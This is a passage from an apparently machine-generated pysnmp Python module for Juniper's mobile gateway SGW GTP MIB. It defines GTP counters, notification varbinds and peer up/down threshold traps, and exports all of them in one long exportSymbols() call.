if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgRx.setDescription('Number of GTPv2 Piggyback messages received.')
jnxMbgSgwIfPiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
# Varbind objects carried in the GTP notifications, rooted at
# jnxMbgSgwGtpNotificationVars (...2636.3.66.2.2.1.3).  All five scalars are
# accessible-for-notify only, so they are emitted from a single table of
# (subId, symbol, SNMP syntax class, description).
jnxMbgSgwGtpNotificationVars = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3))
_NOTIF_VARS = (
    (1, 'jnxMbgSgwGtpPeerName', DisplayString, 'GTP Peer Name/IP'),
    (2, 'jnxMbgSgwGtpAlarmStatCounter', Unsigned32, 'Current Value of (Alarm) Statistics Counter eg: in jnxMbgSgwGtpPrDNTPerPrAlrmActv it spefies the number of times peer is down with in the monitoring interval'),
    (3, 'jnxMbgSgwGtpInterfaceType', DisplayString, 'GTP Interface Type which can be one of S5/S8/S11/S1U/S12/S4'),
    (4, 'jnxMbgSgwGtpGwName', DisplayString, 'A string that indicates the gateway name'),
    (5, 'jnxMbgSgwGtpGwIndex', Unsigned32, 'Current Gateway ID value'),
)
for _sub_id, _symbol, _syntax, _descr in _NOTIF_VARS:
    _scalar = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, _sub_id), _syntax()).setMaxAccess("accessiblefornotify")
    if mibBuilder.loadTexts:
        _scalar.setStatus('current')
        _scalar.setDescription(_descr)
    # Publish under the generated symbol name for exportSymbols() below.
    globals()[_symbol] = _scalar
del _NOTIF_VARS, _sub_id, _symbol, _syntax, _descr, _scalar
# GTP peer trap definitions (...2636.3.66.2.2.0.1-.4).  The up/down traps
# carry the gateway/peer identification varbinds; the two threshold-alarm
# traps additionally carry the alarm statistics counter.
_GTP_MIB_MODULE = "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB"
_PEER_VARBINDS = ('jnxMbgSgwGtpGwIndex', 'jnxMbgSgwGtpGwName', 'jnxMbgSgwGtpInterfaceType', 'jnxMbgSgwGtpPeerName')
_GTP_NOTIFICATIONS = (
    (1, 'jnxMbgSgwGtpPeerGwUpNotif', _PEER_VARBINDS, 'GTPC Peer UP Notification. This trap is sent when a new peer is added or an existing peer goes down and comes back up.'),
    (2, 'jnxMbgSgwGtpPeerGwDnNotif', _PEER_VARBINDS, 'GTPC Peer Down Notification. This trap is sent when a peer connection goes down.'),
    (3, 'jnxMbgSgwGtpPrDnTPerPrAlrmActv', _PEER_VARBINDS + ('jnxMbgSgwGtpAlarmStatCounter',), 'Peer down Threshold trap Active. This is sent when a peer connection flaps for more than a higher threshold number of times with in a monitor interval.'),
    (4, 'jnxMbgSgwGtpPrDnTPerPrAlrmClr', _PEER_VARBINDS + ('jnxMbgSgwGtpAlarmStatCounter',), 'Peer down Threshold trap Cleared. This is sent when the number of times a peer connection flaps in a monitor interval come down below the lower threshold.'),
)
for _sub_id, _symbol, _varbinds, _descr in _GTP_NOTIFICATIONS:
    # setObjects() takes one (module, symbol) pair per varbind, in order.
    _notif = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0, _sub_id)).setObjects(*[(_GTP_MIB_MODULE, _vb) for _vb in _varbinds])
    if mibBuilder.loadTexts:
        _notif.setStatus('current')
        _notif.setDescription(_descr)
    # Publish under the generated symbol name for exportSymbols() below.
    globals()[_symbol] = _notif
del _GTP_MIB_MODULE, _PEER_VARBINDS, _GTP_NOTIFICATIONS, _sub_id, _symbol, _varbinds, _descr, _notif, _vb
# Register the first batch of this module's symbols with the pysnmp
# MibBuilder so other MIB modules can import them by name.  The
# PYSNMP_MODULE_ID keyword marks jnxMbgSgwGtpMib as this module's identity
# object.  The argument list is machine-generated (one keyword per MIB
# object defined above); a second exportSymbols() call follows for the
# remaining symbols because of the large symbol count.
mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwIfGtpV2ICsPkFltManErRx=jnxMbgSgwIfGtpV2ICsPkFltManErRx, jnxMbgSgwGtpV2ICsGREKeyNtFdTx=jnxMbgSgwGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPIPProtoErrRx=jnxMbgSgwPPIPProtoErrRx, jnxMbgSgwCrtBrReqRx=jnxMbgSgwCrtBrReqRx, jnxMbgSgwPPV2NumMsgRx=jnxMbgSgwPPV2NumMsgRx, jnxMbgSgwPPGtpV2ICsTFTSMANTErRx=jnxMbgSgwPPGtpV2ICsTFTSMANTErRx, jnxMbgSgwIPProtoErrRx=jnxMbgSgwIPProtoErrRx, jnxMbgSgwPPModBrCmdRx=jnxMbgSgwPPModBrCmdRx, jnxMbgSgwGtpPeerGwUpNotif=jnxMbgSgwGtpPeerGwUpNotif, jnxMbgSgwPPGtpV2ICsCtxNotFndTx=jnxMbgSgwPPGtpV2ICsCtxNotFndTx, jnxMbgSgwGtpMib=jnxMbgSgwGtpMib, jnxMbgSgwIfUnSupportedMsgRx=jnxMbgSgwIfUnSupportedMsgRx, jnxMbgSgwPPGtpV2ICsOptIEIncorTx=jnxMbgSgwPPGtpV2ICsOptIEIncorTx, jnxMbgSgwIfGtpV1ErrIndTx=jnxMbgSgwIfGtpV1ErrIndTx, jnxMbgSgwGtpV2ICsUERefusesRx=jnxMbgSgwGtpV2ICsUERefusesRx, jnxMbgSgwPPCreateSessReqRx=jnxMbgSgwPPCreateSessReqRx, jnxMbgSgwPcktLenErrRx=jnxMbgSgwPcktLenErrRx, jnxMbgSgwGtpV2ICsOptIEIncorrTx=jnxMbgSgwGtpV2ICsOptIEIncorrTx, jnxMbgSgwPPGtpV2ICsSysFailTx=jnxMbgSgwPPGtpV2ICsSysFailTx, jnxMbgSgwGtpV2ICsUENotRespTx=jnxMbgSgwGtpV2ICsUENotRespTx, jnxMbgSgwIfGtpV2ICsManIEMissTx=jnxMbgSgwIfGtpV2ICsManIEMissTx, jnxMbgSgwPPGtpV2ICsAPNAcsDenTx=jnxMbgSgwPPGtpV2ICsAPNAcsDenTx, jnxMbgSgwPPGtpV2ICsEIFRNCEnTx=jnxMbgSgwPPGtpV2ICsEIFRNCEnTx, jnxMbgSgwPPGtpV2ICsNoResRx=jnxMbgSgwPPGtpV2ICsNoResRx, jnxMbgSgwGtpV2ICsOptIEIncorrRx=jnxMbgSgwGtpV2ICsOptIEIncorrRx, jnxMbgSgwPPUpdConnSetReqTx=jnxMbgSgwPPUpdConnSetReqTx, jnxMbgSgwUnSupportedMsgRx=jnxMbgSgwUnSupportedMsgRx, jnxMbgSgwRelAcsBrReqTx=jnxMbgSgwRelAcsBrReqTx, jnxMbgSgwPPDelBrCmdRx=jnxMbgSgwPPDelBrCmdRx, jnxMbgSgwIfCrIndTunRespTx=jnxMbgSgwIfCrIndTunRespTx, jnxMbgSgwPPCrIndTunRespRx=jnxMbgSgwPPCrIndTunRespRx, jnxMbgSgwIfGtpV2ICsTFTSMANTErRx=jnxMbgSgwIfGtpV2ICsTFTSMANTErRx, jnxMbgSgwPPModBrCmdTx=jnxMbgSgwPPModBrCmdTx, jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx=jnxMbgSgwPPGtpV2ICsNOTFTUECTXRx, jnxMbgSgwIfGtpV2ICsAcceptPartRx=jnxMbgSgwIfGtpV2ICsAcceptPartRx, 
jnxMbgSgwPPGtpV2ICsInvPrRx=jnxMbgSgwPPGtpV2ICsInvPrRx, PYSNMP_MODULE_ID=jnxMbgSgwGtpMib, jnxMbgSgwGtpV2ICsAPNAcsDenTx=jnxMbgSgwGtpV2ICsAPNAcsDenTx, jnxMbgSgwPPGTPUnknVerRx=jnxMbgSgwPPGTPUnknVerRx, jnxMbgSgwPPGtpV2ICsRATChgRx=jnxMbgSgwPPGtpV2ICsRATChgRx, jnxMbgSgwPPGtpV2ICsAcceptPartTx=jnxMbgSgwPPGtpV2ICsAcceptPartTx, jnxMbgSgwPPGtpV2ICsRATChgTx=jnxMbgSgwPPGtpV2ICsRATChgTx, jnxMbgSgwGtpV2ICsServDeniedTx=jnxMbgSgwGtpV2ICsServDeniedTx, jnxMbgSgwIfGtpV2ICsInvPrRx=jnxMbgSgwIfGtpV2ICsInvPrRx, jnxMbgSgwIfCrIndTunReqTx=jnxMbgSgwIfCrIndTunReqTx, jnxMbgSgwRelAcsBrRespRx=jnxMbgSgwRelAcsBrRespRx, jnxMbgSgwCreateSessRspTx=jnxMbgSgwCreateSessRspTx, jnxMbgSgwUpdBrRspTx=jnxMbgSgwUpdBrRspTx, jnxMbgSgwPPRxPacketsDropped=jnxMbgSgwPPRxPacketsDropped, jnxMbgSgwDelBrCmdRx=jnxMbgSgwDelBrCmdRx, jnxMbgSgwGtpV2ICsLclDetRx=jnxMbgSgwGtpV2ICsLclDetRx, jnxMbgSgwPPStopPagingIndTx=jnxMbgSgwPPStopPagingIndTx, jnxMbgSgwGtpPrDnTPerPrAlrmClr=jnxMbgSgwGtpPrDnTPerPrAlrmClr, jnxMbgSgwPPModBrRspRx=jnxMbgSgwPPModBrRspRx, jnxMbgSgwPPUpdBrReqRx=jnxMbgSgwPPUpdBrReqRx, jnxMbgSgwGtpV2ICsPTMSISigMMTx=jnxMbgSgwGtpV2ICsPTMSISigMMTx, jnxMbgSgwPPGtpV2ICsMisUnknAPNTx=jnxMbgSgwPPGtpV2ICsMisUnknAPNTx, jnxMbgSgwGtpV2ICsReqRejTx=jnxMbgSgwGtpV2ICsReqRejTx, jnxMbgSgwGtpV2ICsCtxNotFndRx=jnxMbgSgwGtpV2ICsCtxNotFndRx, jnxMbgSgwIfCrtBrReqTx=jnxMbgSgwIfCrtBrReqTx, jnxMbgSgwIfResumeAckTx=jnxMbgSgwIfResumeAckTx, jnxMbgSgwV2NumMsgTx=jnxMbgSgwV2NumMsgTx, jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx=jnxMbgSgwPPGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPGtpV2ICsInvMsgFmtRx=jnxMbgSgwPPGtpV2ICsInvMsgFmtRx, jnxMbgSgwIfGtpV2ICsInvTotLenTx=jnxMbgSgwIfGtpV2ICsInvTotLenTx, jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx=jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx, jnxMbgSgwPPGtpV2ICsIMSINotKnTx=jnxMbgSgwPPGtpV2ICsIMSINotKnTx, jnxMbgSgwGtpV2ICsUnknownRx=jnxMbgSgwGtpV2ICsUnknownRx, jnxMbgSgwUpdConnSetRspTx=jnxMbgSgwUpdConnSetRspTx, jnxMbgSgwCreateSessReqRx=jnxMbgSgwCreateSessReqRx, jnxMbgSgwGtpV2ICsInvTotLenRx=jnxMbgSgwGtpV2ICsInvTotLenRx, jnxMbgSgwDelBrReqRx=jnxMbgSgwDelBrReqRx, 
jnxMbgSgwIfV2EchoRespTx=jnxMbgSgwIfV2EchoRespTx, jnxMbgSgwIfGtpV2ICsVerNotSuppTx=jnxMbgSgwIfGtpV2ICsVerNotSuppTx, jnxMbgSgwIfGtpV2ICsRPrNtRspRx=jnxMbgSgwIfGtpV2ICsRPrNtRspRx, jnxMbgSgwIfGtpV2ICsUnexpRptIETx=jnxMbgSgwIfGtpV2ICsUnexpRptIETx, jnxMbgSgwGtpV2ICsRelocFailTx=jnxMbgSgwGtpV2ICsRelocFailTx, jnxMbgSgwGtpV2ICsAllDynAdOccRx=jnxMbgSgwGtpV2ICsAllDynAdOccRx, jnxMbgSgwPPDelSessReqTx=jnxMbgSgwPPDelSessReqTx, jnxMbgSgwDelSessReqRx=jnxMbgSgwDelSessReqRx, jnxMbgSgwPPResumeAckTx=jnxMbgSgwPPResumeAckTx, jnxMbgSgwPPGtpV2ICsSynErTADTx=jnxMbgSgwPPGtpV2ICsSynErTADTx, jnxMbgSgwGtpV2ICsUserAUTHFlRx=jnxMbgSgwGtpV2ICsUserAUTHFlRx, jnxMbgSgwIfGtpV2ICsCmpDetTx=jnxMbgSgwIfGtpV2ICsCmpDetTx, jnxMbgSgwGtpV2ICsDtForNtSupRx=jnxMbgSgwGtpV2ICsDtForNtSupRx, jnxMbgSgwIfGtpV2ICsUnabPageUERx=jnxMbgSgwIfGtpV2ICsUnabPageUERx, jnxMbgSgwPPGtpV2ICsProtoNtSupRx=jnxMbgSgwPPGtpV2ICsProtoNtSupRx, jnxMbgSgwV2VerNotSupTx=jnxMbgSgwV2VerNotSupTx, jnxMbgSgwGtpV2ICsInReFRePrRx=jnxMbgSgwGtpV2ICsInReFRePrRx, jnxMbgSgwIfGtpV2ICsSysFailRx=jnxMbgSgwIfGtpV2ICsSysFailRx, jnxMbgSgwIfGtpV2ICsInReFRePrTx=jnxMbgSgwIfGtpV2ICsInReFRePrTx, jnxMbgSgwPPDlDataNotifTx=jnxMbgSgwPPDlDataNotifTx, jnxMbgSgwIfGtpV2ICsRelocFailRx=jnxMbgSgwIfGtpV2ICsRelocFailRx, jnxMbgSgwDelConnSetRspTx=jnxMbgSgwDelConnSetRspTx, jnxMbgSgwT3RespTmrExpRx=jnxMbgSgwT3RespTmrExpRx, jnxMbgSgwStopPagingIndRx=jnxMbgSgwStopPagingIndRx, jnxMbgSgwDelSessReqTx=jnxMbgSgwDelSessReqTx, jnxMbgSgwGtpV2ICsTFTSysErrRx=jnxMbgSgwGtpV2ICsTFTSysErrRx, jnxMbgSgwPPRelAcsBrRespRx=jnxMbgSgwPPRelAcsBrRespRx, jnxMbgSgwIfDelSessReqRx=jnxMbgSgwIfDelSessReqRx, jnxMbgSgwGtpV2ICsReqAcceptTx=jnxMbgSgwGtpV2ICsReqAcceptTx, jnxMbgSgwPPRelAcsBrRespTx=jnxMbgSgwPPRelAcsBrRespTx, jnxMbgSgwIfGtpV1EchoRespTx=jnxMbgSgwIfGtpV1EchoRespTx, jnxMbgSgwGtpV2ICsAcceptPartTx=jnxMbgSgwGtpV2ICsAcceptPartTx, jnxMbgSgwIfModBrReqRx=jnxMbgSgwIfModBrReqRx, jnxMbgSgwGtpCGlbStatsTable=jnxMbgSgwGtpCGlbStatsTable, jnxMbgSgwGtpV2ICsPkFltSynErrTx=jnxMbgSgwGtpV2ICsPkFltSynErrTx, 
jnxMbgSgwIfDelBrRspTx=jnxMbgSgwIfDelBrRspTx, jnxMbgSgwV2EchoReqRx=jnxMbgSgwV2EchoReqRx, jnxMbgSgwPPGtpV1EchoReqTx=jnxMbgSgwPPGtpV1EchoReqTx, jnxMbgSgwPPGtpV2ICsUERefusesRx=jnxMbgSgwPPGtpV2ICsUERefusesRx, jnxMbgSgwGtpV2ICsInReFRePrTx=jnxMbgSgwGtpV2ICsInReFRePrTx, jnxMbgSgwIfGtpV2ICsSrvNotSuppRx=jnxMbgSgwIfGtpV2ICsSrvNotSuppRx, jnxMbgSgwPPDelBrRspTx=jnxMbgSgwPPDelBrRspTx, jnxMbgSgwResumeAckRx=jnxMbgSgwResumeAckRx, jnxMbgSgwPPPacketAllocFail=jnxMbgSgwPPPacketAllocFail, jnxMbgSgwPPGtpV2ICsDenINRatTx=jnxMbgSgwPPGtpV2ICsDenINRatTx, jnxMbgSgwUnknMsgRx=jnxMbgSgwUnknMsgRx, jnxMbgSgwPPDelIndTunRespTx=jnxMbgSgwPPDelIndTunRespTx, jnxMbgSgwIfGtpV2ICsUnexpRptIERx=jnxMbgSgwIfGtpV2ICsUnexpRptIERx, jnxMbgSgwIfCrtBrRspTx=jnxMbgSgwIfCrtBrRspTx, jnxMbgSgwGtpV2ICsNewPTNPrefTx=jnxMbgSgwGtpV2ICsNewPTNPrefTx, jnxMbgSgwIfGtpV2ICsUnknownRx=jnxMbgSgwIfGtpV2ICsUnknownRx, jnxMbgSgwGtpPrDnTPerPrAlrmActv=jnxMbgSgwGtpPrDnTPerPrAlrmActv, jnxMbgSgwPPGtpV2ICsPkFltManErRx=jnxMbgSgwPPGtpV2ICsPkFltManErRx, jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx=jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx, jnxMbgSgwIfDelBrFlrIndTx=jnxMbgSgwIfDelBrFlrIndTx, jnxMbgSgwIfGtpV2ICsPkFltManErTx=jnxMbgSgwIfGtpV2ICsPkFltManErTx, jnxMbgSgwStopPagingIndTx=jnxMbgSgwStopPagingIndTx, jnxMbgSgwGtpV2ICsProtoNtSupTx=jnxMbgSgwGtpV2ICsProtoNtSupTx, jnxMbgSgwIfRelAcsBrReqRx=jnxMbgSgwIfRelAcsBrReqRx, jnxMbgSgwGtpV2ICsCmpDetRx=jnxMbgSgwGtpV2ICsCmpDetRx, jnxMbgSgwIfDelBrRspRx=jnxMbgSgwIfDelBrRspRx, jnxMbgSgwPPDelIndTunRespRx=jnxMbgSgwPPDelIndTunRespRx, jnxMbgSgwPPGtpV1UnSupMsgRx=jnxMbgSgwPPGtpV1UnSupMsgRx, jnxMbgSgwPPGtpV1EchoReqRx=jnxMbgSgwPPGtpV1EchoReqRx, jnxMbgSgwIfGtpV2ICsPkFltSynErTx=jnxMbgSgwIfGtpV2ICsPkFltSynErTx, jnxMbgSgwIfCrIndTunReqRx=jnxMbgSgwIfCrIndTunReqRx, jnxMbgSgwGtpV2ICsManIEIncorrTx=jnxMbgSgwGtpV2ICsManIEIncorrTx, jnxMbgSgwIfGtpV2ICsManIEMissRx=jnxMbgSgwIfGtpV2ICsManIEMissRx, jnxMbgSgwPPCreateSessReqTx=jnxMbgSgwPPCreateSessReqTx, jnxMbgSgwIfDelConnSetReqTx=jnxMbgSgwIfDelConnSetReqTx, 
jnxMbgSgwPPGtpV2ICsPTNotSuppTx=jnxMbgSgwPPGtpV2ICsPTNotSuppTx, jnxMbgSgwPPDlDataAckTx=jnxMbgSgwPPDlDataAckTx, jnxMbgSgwIfDelConnSetRspTx=jnxMbgSgwIfDelConnSetRspTx, jnxMbgSgwPPModBrReqRx=jnxMbgSgwPPModBrReqRx, jnxMbgSgwRxPacketsDropped=jnxMbgSgwRxPacketsDropped, jnxMbgSgwIfGtpV2ICsColNWReqTx=jnxMbgSgwIfGtpV2ICsColNWReqTx, jnxMbgSgwPPGtpV2ICsUnPgUESusRx=jnxMbgSgwPPGtpV2ICsUnPgUESusRx, jnxMbgSgwDelConnSetReqTx=jnxMbgSgwDelConnSetReqTx, jnxMbgSgwGtpV1EchoReqTx=jnxMbgSgwGtpV1EchoReqTx, jnxMbgSgwPPCrtBrRspRx=jnxMbgSgwPPCrtBrRspRx, jnxMbgSgwIfStopPagingIndRx=jnxMbgSgwIfStopPagingIndRx, jnxMbgSgwIfGtpV2ICsLclDetRx=jnxMbgSgwIfGtpV2ICsLclDetRx, jnxMbgSgwIfModBrRspRx=jnxMbgSgwIfModBrRspRx, jnxMbgSgwS11PiggybackMsgTx=jnxMbgSgwS11PiggybackMsgTx, jnxMbgSgwGtpV2ICsSynErTADRx=jnxMbgSgwGtpV2ICsSynErTADRx, jnxMbgSgwPPGtpV2ICsISRDeactTx=jnxMbgSgwPPGtpV2ICsISRDeactTx, jnxMbgSgwIfGtpV2ICsUnPgUESusTx=jnxMbgSgwIfGtpV2ICsUnPgUESusTx, jnxMbgSgwGtpV2ICsUnexpRptIERx=jnxMbgSgwGtpV2ICsUnexpRptIERx, jnxMbgSgwGtpV2ICsUnabPageUETx=jnxMbgSgwGtpV2ICsUnabPageUETx, jnxMbgSgwGtpV2ICsRATChgRx=jnxMbgSgwGtpV2ICsRATChgRx, jnxMbgSgwGtpV2ICsColNWReqTx=jnxMbgSgwGtpV2ICsColNWReqTx, jnxMbgSgwPPGtpV2ICsDtForNtSupRx=jnxMbgSgwPPGtpV2ICsDtForNtSupRx, jnxMbgSgwPPDelConnSetRspRx=jnxMbgSgwPPDelConnSetRspRx, jnxMbgSgwPPResumeNotifRx=jnxMbgSgwPPResumeNotifRx, jnxMbgSgwIfCrtBrRspRx=jnxMbgSgwIfCrtBrRspRx, jnxMbgSgwIfGtpV2ICsInvLenRx=jnxMbgSgwIfGtpV2ICsInvLenRx, jnxMbgSgwPPGtpV2ICsPTNotSuppRx=jnxMbgSgwPPGtpV2ICsPTNotSuppRx, jnxMbgSgwPPGtpV2ICsRMValRcvTx=jnxMbgSgwPPGtpV2ICsRMValRcvTx, jnxMbgSgwPPGtpV2ICsMisUnknAPNRx=jnxMbgSgwPPGtpV2ICsMisUnknAPNRx, jnxMbgSgwGtpV2ICsDeniedINRatRx=jnxMbgSgwGtpV2ICsDeniedINRatRx, jnxMbgSgwGtpV2ICsManIEIncorrRx=jnxMbgSgwGtpV2ICsManIEIncorrRx, jnxMbgSgwGtpV2ICsReqRejRx=jnxMbgSgwGtpV2ICsReqRejRx, jnxMbgSgwPPPiggybackMsgTx=jnxMbgSgwPPPiggybackMsgTx, jnxMbgSgwPPGtpV2ICsInvLenRx=jnxMbgSgwPPGtpV2ICsInvLenRx, jnxMbgSgwIfGtpV2ICsEIFRNCEnRx=jnxMbgSgwIfGtpV2ICsEIFRNCEnRx, 
jnxMbgSgwPPBrResFlrIndTx=jnxMbgSgwPPBrResFlrIndTx, jnxMbgSgwIfModBrCmdRx=jnxMbgSgwIfModBrCmdRx, jnxMbgSgwIfDelIndTunRespRx=jnxMbgSgwIfDelIndTunRespRx, jnxMbgSgwGtpV1EchoReqRx=jnxMbgSgwGtpV1EchoReqRx, jnxMbgSgwIfDelBrReqTx=jnxMbgSgwIfDelBrReqTx, jnxMbgSgwIfGtpV2ICsUserAUTHFlTx=jnxMbgSgwIfGtpV2ICsUserAUTHFlTx, jnxMbgSgwIfGtpV2ICsCmpDetRx=jnxMbgSgwIfGtpV2ICsCmpDetRx, jnxMbgSgwIfSuspAckTx=jnxMbgSgwIfSuspAckTx, jnxMbgSgwGtpV2ICsCtxNotFndTx=jnxMbgSgwGtpV2ICsCtxNotFndTx, jnxMbgSgwPPGtpV1ErrIndTx=jnxMbgSgwPPGtpV1ErrIndTx, jnxMbgSgwGtpV2ICsUERefusesTx=jnxMbgSgwGtpV2ICsUERefusesTx, jnxMbgSgwPPCrIndTunRespTx=jnxMbgSgwPPCrIndTunRespTx, jnxMbgSgwPPIPVerErrRx=jnxMbgSgwPPIPVerErrRx, jnxMbgSgwIfUpdBrReqTx=jnxMbgSgwIfUpdBrReqTx, jnxMbgSgwIfGtpV2ICsCtxNotFndRx=jnxMbgSgwIfGtpV2ICsCtxNotFndRx, jnxMbgSgwIfGtpV2ICsTFTSysErrTx=jnxMbgSgwIfGtpV2ICsTFTSysErrTx, jnxMbgSgwGtpV2ICsLclDetTx=jnxMbgSgwGtpV2ICsLclDetTx, jnxMbgSgwPPGtpV2ICsPkFltManErTx=jnxMbgSgwPPGtpV2ICsPkFltManErTx, jnxMbgSgwPPGtpV2ICsUENotRespTx=jnxMbgSgwPPGtpV2ICsUENotRespTx, jnxMbgSgwGtpV1ErrIndRx=jnxMbgSgwGtpV1ErrIndRx, jnxMbgSgwIfModBrFlrIndTx=jnxMbgSgwIfModBrFlrIndTx, jnxMbgSgwPPGtpV2ICsPTMSISigMMTx=jnxMbgSgwPPGtpV2ICsPTMSISigMMTx, jnxMbgSgwIfGtpV2ICsSemErTADTx=jnxMbgSgwIfGtpV2ICsSemErTADTx, jnxMbgSgwPPUnSupportedMsgRx=jnxMbgSgwPPUnSupportedMsgRx, jnxMbgSgwIfDelSessRspTx=jnxMbgSgwIfDelSessRspTx, jnxMbgSgwIfGTPUnknVerRx=jnxMbgSgwIfGTPUnknVerRx, jnxMbgSgwPPGTPPortErrRx=jnxMbgSgwPPGTPPortErrRx, jnxMbgSgwIfGtpV2ICsUERefusesTx=jnxMbgSgwIfGtpV2ICsUERefusesTx, jnxMbgSgwDelBrFlrIndRx=jnxMbgSgwDelBrFlrIndRx, jnxMbgSgwS4PiggybackMsgTx=jnxMbgSgwS4PiggybackMsgTx, jnxMbgSgwIfGtpV1EndMarkerRx=jnxMbgSgwIfGtpV1EndMarkerRx, jnxMbgSgwGtpV2ICsGREKeyNtFdRx=jnxMbgSgwGtpV2ICsGREKeyNtFdRx, jnxMbgSgwGtpV2ICsTFTSMANTErTx=jnxMbgSgwGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfBrResCmdTx=jnxMbgSgwIfBrResCmdTx, jnxMbgSgwPPResumeNotifTx=jnxMbgSgwPPResumeNotifTx, jnxMbgSgwIfGtpV2ICsPTNotSuppRx=jnxMbgSgwIfGtpV2ICsPTNotSuppRx, 
jnxMbgSgwIfGtpV2ICsSrvNotSuppTx=jnxMbgSgwIfGtpV2ICsSrvNotSuppTx, jnxMbgSgwPPGtpV2ICsInReFRePrTx=jnxMbgSgwPPGtpV2ICsInReFRePrTx, jnxMbgSgwPPDelBrFlrIndTx=jnxMbgSgwPPDelBrFlrIndTx, jnxMbgSgwIfGtpV2ICsTFTSysErrRx=jnxMbgSgwIfGtpV2ICsTFTSysErrRx, jnxMbgSgwIfGTPPortErrRx=jnxMbgSgwIfGTPPortErrRx, jnxMbgSgwPPGtpV2ICsSynErTADRx=jnxMbgSgwPPGtpV2ICsSynErTADRx, jnxMbgSgwPPGtpV2ICsPTMSISigMMRx=jnxMbgSgwPPGtpV2ICsPTMSISigMMRx, jnxMbgSgwGtpV2ICsInvMsgFmtTx=jnxMbgSgwGtpV2ICsInvMsgFmtTx, jnxMbgSgwPPGtpV2ICsInvPrTx=jnxMbgSgwPPGtpV2ICsInvPrTx, jnxMbgSgwIfV2NumBytesTx=jnxMbgSgwIfV2NumBytesTx, jnxMbgSgwIfGtpV2ICsUnPgUESusRx=jnxMbgSgwIfGtpV2ICsUnPgUESusRx, jnxMbgSgwPPGtpV1EchoRespRx=jnxMbgSgwPPGtpV1EchoRespRx, jnxMbgSgwGtpV2ICsPageTx=jnxMbgSgwGtpV2ICsPageTx, jnxMbgSgwGtpV2ICsNewPTSIAdbrRx=jnxMbgSgwGtpV2ICsNewPTSIAdbrRx, jnxMbgSgwIfGtpV2ICsAPNAcsDenRx=jnxMbgSgwIfGtpV2ICsAPNAcsDenRx, jnxMbgSgwIfModBrFlrIndRx=jnxMbgSgwIfModBrFlrIndRx, jnxMbgSgwS5PiggybackMsgRx=jnxMbgSgwS5PiggybackMsgRx, jnxMbgSgwIfGtpV2ICsInvMsgFmtRx=jnxMbgSgwIfGtpV2ICsInvMsgFmtRx, jnxMbgSgwGtpV2ICsPTMSISigMMRx=jnxMbgSgwGtpV2ICsPTMSISigMMRx, jnxMbgSgwIfGtpV2ICsRATChgTx=jnxMbgSgwIfGtpV2ICsRATChgTx, jnxMbgSgwPPGtpV2ICsUnknownRx=jnxMbgSgwPPGtpV2ICsUnknownRx, jnxMbgSgwPPDelSessReqRx=jnxMbgSgwPPDelSessReqRx, jnxMbgSgwPPT3RespTmrExpRx=jnxMbgSgwPPT3RespTmrExpRx, jnxMbgSgwIfGtpV2ICsLclDetTx=jnxMbgSgwIfGtpV2ICsLclDetTx, jnxMbgSgwGtpV2ICsServNotSuppRx=jnxMbgSgwGtpV2ICsServNotSuppRx, jnxMbgSgwPPDelConnSetRspTx=jnxMbgSgwPPDelConnSetRspTx, jnxMbgSgwPacketSendFail=jnxMbgSgwPacketSendFail, jnxMbgSgwIfModBrCmdTx=jnxMbgSgwIfModBrCmdTx, jnxMbgSgwGtpV2ICsNoMemTx=jnxMbgSgwGtpV2ICsNoMemTx, jnxMbgSgwIfGtpV2ICsIMSINotKnTx=jnxMbgSgwIfGtpV2ICsIMSINotKnTx, jnxMbgSgwPPGtpV2ICsVerNotSuppRx=jnxMbgSgwPPGtpV2ICsVerNotSuppRx, jnxMbgSgwGtpV2ICsRMValRcvTx=jnxMbgSgwGtpV2ICsRMValRcvTx, jnxMbgSgwIfGtpV2ICsDtForNtSupRx=jnxMbgSgwIfGtpV2ICsDtForNtSupRx, jnxMbgSgwIfUpdBrReqRx=jnxMbgSgwIfUpdBrReqRx, jnxMbgSgwModBrFlrIndTx=jnxMbgSgwModBrFlrIndTx, 
jnxMbgSgwDlDataNotifTx=jnxMbgSgwDlDataNotifTx, jnxMbgSgwGtpV2ICsPkFltSynErrRx=jnxMbgSgwGtpV2ICsPkFltSynErrRx, jnxMbgSgwPPGtpV2ICsManIEMissRx=jnxMbgSgwPPGtpV2ICsManIEMissRx, jnxMbgSgwCrIndTunRespTx=jnxMbgSgwCrIndTunRespTx, jnxMbgSgwPPCrtBrReqTx=jnxMbgSgwPPCrtBrReqTx, jnxMbgSgwPPGtpV2ICsServDeniedRx=jnxMbgSgwPPGtpV2ICsServDeniedRx)
